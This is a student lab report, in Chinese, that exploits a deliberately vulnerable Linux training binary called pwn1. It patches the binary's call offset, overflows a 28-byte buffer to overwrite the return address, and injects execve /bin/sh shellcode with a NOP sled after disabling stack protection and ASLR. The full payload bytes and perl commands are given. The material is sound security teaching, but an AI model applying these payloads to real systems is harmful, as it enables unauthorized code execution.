Exp1 PC平台逆向破解(5)M

一、实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

·三个实践内容如下：

1.手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

3.注入一个自己制作的shellcode并运行这段shellcode。

·这几种思路，基本代表现实情况中的攻击目标:

1.运行原本不可访问的代码片段

2.强行修改程序执行流

3.以及注入运行任意代码。

几个汇编指令：

NOP：空操作指令，用于控制时间周期，行Nop指令只使程序计数器PC加1，机器码为0x90。

JNE：一个条件转移指令，如果不相等则跳转，机器码为75。

JE：一个条件转移指令，如果相等则跳转，机器码为74。

JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）。

CMP：算数处理指令,用于把一个寄存器的内容和另一个寄存器的内容或立即数进行减法比较,不存储结果,都会更改标志位，机器码为38-3D。

二、直接修改程序机器指令，改变程序执行流程

·知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具

·学习目标：理解可执行文件与机器指令

·进阶：掌握ELF文件格式，掌握动态技术

打开终端，输入objdump -d pwn1-20191202 | more进行反汇编

其中，汇编指令“call 8048491” 将调用位于地址8048491处的foo函数，其对应机器指令为“e8 d7ffffff”，e8即跳转之意。

·本来正常流程，此时此刻EIP的值应该是下条指令的地址，即80484ba，但如一解释e8这条指令呢，CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41，41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值。

·main函数调用foo，对应机器指令为“ e8 d7ffffff”，

·那我们想让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。

·用Windows计算器，直接 47d-4ba就能得到补码，是c3ffffff。

·下面我们就修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff。

（1）复制pwn1到pwn2；

（2）在vi中打开pwn2；

（3）输入%！xxd将显示模式切换为16进制模式；

（4）查找要修改内容/e8d7，将d7改为c3l；

（5）输入%！xxd -r转换16进制为原格式，存盘退出。

再反汇编看一下，call指令是否正确调用getShell

运行下改后的代码，会得到shell提示符#

三、通过构造输入参数，造成BOF攻击，改变程序执行流

知识要求：堆栈结构，返回地址

学习目标：理解攻击缓冲区的结果，掌握返回地址的获取

进阶：掌握ELF文件格式，掌握动态技术

1.反汇编，了解程序的基本功能

== 注意这个函数getShell，我们的目标是触发这个函数  ==

== 该可执行文件正常运行是调用如下函数foo，这个函数有Buffer overflow漏洞  ==

== 这里读入字符串，但系统只预留了28字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址 ==

==上面的call调用foo,同时在堆栈上压上返回地址值:80484ba== 


2.确认输入字符串哪几个字符会覆盖到返回地址
安装jdb，输入jdb -v显示版本信息为成功

当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码：

如果输入字符串1111111122222222333333334444444412345678，那 1234 那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

3.确认用什么值来覆盖返回地址

getShell的内存地址，通过反汇编时可以看到，即0804847d。

接下来要确认下字节序，简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

对比之前 ==eip 0x34333231 0x34333231== ，根据小端优先原则，正确应用输入 ==11111111222222223333333344444444\x7d\x84\x04\x08==。

4.构造输入字符串

由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。

输入“perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input”，使用16进制查看指令xxd查看input文件的内容是否如预期。

然后将input的输入，通过管道符“|”，作为pwn1的输入

四、注入Shellcode并执行

1.准备一段Shellcode

shellcode就是一段机器指令（code）

通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），
所以这段机器指令被称为shellcode。
在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令

2.准备工作

安装prelink

先通过execstack -s指令来设置堆栈可执行
再用 execstack -q 指令查询文件的堆栈是否可执行

关闭地址随机化

3.构造要注入的payload

Linux下有两种基本构造攻击buf的方法：
- retaddr+nop+shellcode
- nop+shellcode+retaddr
因为retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面。
简单说缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边

使用结构为：anything+retaddr+nops+shellcode 的方法

输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。

接下来我们来确定\x4\x3\x2\x1到底该填什么。

打开一个终端注入这段攻击buf：(cat input_shellcode;cat) | ./pwn1-20191202

再开另外一个终端，用gdb来调试pwn1这个进程。

通过指令“ps -ef | grep pwn1-20191202"确定进程号为3889，然后开始gdb调试。

将1234位置的地址加上4字节（shellcode挨在缓冲
区的后面）即可得到shellcode的地址0xffffd500，所以将0xffffd500替换1234，便可令shellcode的地址覆盖ret返回地址，所以此处输入的shellcode应为：
perl -e 'print "A" x 32;print "\x00\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode